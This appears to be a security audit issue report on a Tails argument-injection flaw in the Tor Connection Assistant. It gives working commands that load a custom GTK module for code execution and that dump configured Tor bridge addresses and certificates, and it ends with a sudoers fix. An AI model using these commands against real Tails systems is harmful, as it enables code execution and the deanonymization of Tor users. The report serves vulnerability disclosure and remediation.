TCA - Local Privilege Escalation (LPE) to TCA Sandbox via GTK Argument Injection - Code Execution/deanonymization of TOR users
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/13
Description
The configuration of sudoers allows the low-privileged amensia user to inject an argument into the application /usr/local/bin/tca
.
sudo -l
(root) NOPASSWD: /usr/local/bin/tca
If we run /usr/local/bin/tca --help
we get the following output:
amnesia@amnesia:~$ sudo /usr/local/bin/tca --help
INFO:__main__:['/usr/local/lib/connect-drop', '-c', 'FILE:/run/tca/tca.state:r+', '-c', 'UNIX:/run/tca-portal.sock', '--', '/bin/ip', 'netns', 'exec', 'tca', '/sbin/runuser', '-u', 'amnesia', '--', 'bwrap', '--bind', '/', '/', '--proc', '/proc', '--dev', '/dev', '--bind', '/run/user/1000/.dbus-proxy/a11y-bus-proxy.sock', '/run/user/1000/tails-sandbox/a11y-bus-proxy.sock', '--bind', '/run/user/1000/.dbus-proxy/ibus-proxy.sock', '/run/user/1000/tails-sandbox/ibus-proxy.sock', 'env', 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus', 'XDG_RUNTIME_DIR=/run/user/1000', 'LANG=en_US.UTF-8', 'XDG_CURRENT_DESKTOP=GNOME', 'DISPLAY=:0', 'XAUTHORITY=/run/user/1000/.mutter-Xwaylandauth.QMWI21', 'WAYLAND_DISPLAY=/run/user/1000/wayland-0', 'DESKTOP_STARTUP_ID=', 'NOTIFY_SOCKET=', 'AT_SPI_BUS_ADDRESS=unix:path=/run/user/1000/tails-sandbox/a11y-bus-proxy.sock', 'IBUS_ADDRESS=unix:path=/run/user/1000/tails-sandbox/ibus-proxy.sock', '/usr/bin/python3', '-u', '/usr/lib/python3/dist-packages/tca/application.py', '--help', '--has-persistence', '--has-unlocked-persistence']
usage: application.py [-h] [--debug] [--debug-statefile DEBUG_STATEFILE] [--has-persistence]
[--has-unlocked-persistence] [--log-level {DEBUG,INFO,WARNING,ERROR}]
[--log-target {auto,stderr,syslog}]
[gtk_args ...]
positional arguments:
gtk_args
optional arguments:
-h, --help show this help message and exit
--debug
--debug-statefile DEBUG_STATEFILE
--has-persistence
--has-unlocked-persistence
--log-level {DEBUG,INFO,WARNING,ERROR}
Minimum log level to be displayed (default: INFO)
--log-target {auto,stderr,syslog}
Where to send log to; 'auto' will pick syslog IF stderr is not a tty (default: auto)
As you can see, the --help
is passed as an argument to the python application /usr/lib/python3/dist-packages/tca/application.py. Please note the TCA application runs as the amnesia user but under the
TCAnetwork namespace. However, every GTK application has default arguments, as you may know. One of them is the
--gtk-module` argument that allows the loading of custom GTK modules. It "works" like "LD_PRELOAD" and gives any user code execution inside the GTK application. The attacker can build a custom .so file and load his shell with the following command:
sudo /usr/local/bin/tca --gtk-module /home/amnesia/Desktop/appmenu-gtk-module/builddir/src/gtk-3.0/libappmenu-gtk-module.so
POC - Leaking bridges
sudo /usr/local/bin/tca --debug --log-level=DEBUG
DEBUG:TCAApplication:Tor connection config: {'bridges': ['obfs4 192.95.36.142:443 CDF2E852BF539B82BD10E27E9115A31734E378C2 cert=qUVQ0srL1JI/vO6V6m/24anYXiJD3QP2HgzUKQtQ7GRqqUvs7P+tG43RtAqdhLOALP7DJQ iat-mode=1', 'obfs4 37.218.245.14:38224 D9A82D2F9C2F65A18407B1D2B764F130847F8B5D cert=bjRaMrr1BRiAW8IE9U5z27fQaYgOhX1UCmOpg2pFpoMvo6ZgQMzLsaTzzQNTlm7hNcb+Sg iat-mode=0', 'obfs4 85.31.186.98:443 011F2599C0E9B27EE74B353155E244813763C3E5 cert=ayq0XzCwhpdysn5o0EyDUbmSOx3X/oTEbzDMvczHOdBJKlvIdHHLJGkZARtT4dcBFArPPg iat-mode=0', 'obfs4 85.31.186.26:443 91A6354697E6B02A386312F68D82CF86824D3606 cert=PBwr+S8JTVZo6MPdHnkTwXJPILWADLqfMGoVvhZClMq/Urndyd42BwX9YFJHZnBB3H0XCw iat-mode=0', 'obfs4 193.11.166.194:27015 2D82C2E354D531A68469ADF7F878FA6060C6BACA cert=4TLQPJrTSaDffMK7Nbao6LC7G9OW/NHkUwIdjLSS3KYf0Nv4/nQiiI8dY2TcsQx01NniOg iat-mode=0', 'obfs4 193.11.166.194:27020 86AC7B8D430DAC4117E9F42C9EAED18133863AAF cert=0LDeJH4JzMDtkJJrFphJCiPqKx7loozKN7VNfuukMGfHO0Z8OGdzHVkhVAOfo1mUdv9cMg iat-mode=0', 'obfs4 193.11.166.194:27025 1AE2C08904527FEA90C4C4F8C1083EA59FBC6FAF cert=ItvYZzW5tn6v3G4UnQa6Qz04Npro6e81AP70YujmK/KXwDFPTs3aHXcHp4n8Vt6w/bv8cA iat-mode=0', 'obfs4 209.148.46.65:443 74FAD13168806246602538555B5521A0383A1875 cert=ssH+9rP8dG2NLDN2XuFw63hIO/9MNNinLmxQDpVa+7kTOa9/m+tGWT1SmSYpQ9uTBGa6Hw iat-mode=0', 'obfs4 146.57.248.225:22 10A6CD36A537FCE513A322361547444B393989F0 cert=K1gDtDAIcUfeLqbstggjIw2rtgIKqdIhUlHp82XRqNSq/mtAjp1BIC9vHKJ2FAEpGssTPw iat-mode=0', 'obfs4 45.145.95.6:27015 C5B7CD6946FF10C5B3E89691A7D3F2C122D2117C cert=TD7PbUO0/0k6xYHMPW3vJxICfkMZNdkRrb63Zhl5j9dW3iRGiCx0A7mPhe5T2EDzQ35+Zw iat-mode=0', 'obfs4 51.222.13.177:80 5EDAC3B810E12B01F6FD8050D2FD3E277B289A08 cert=2uplIpLQ0q9+0qMFrK5pkaYRDOe460LL9WHBvatgkuRr/SL31wBOEupaMMJ6koRE6Ld0ew iat-mode=0'], 'proxy': None}
Impact
- Access to the TCA Sandbox, running inside the UI, lead to direct control over the TCA service, maybe?
- Leaking configured TOR bridges could deanonymize the Tails user.
Patch
- Disable arguments by adapting the sudoers file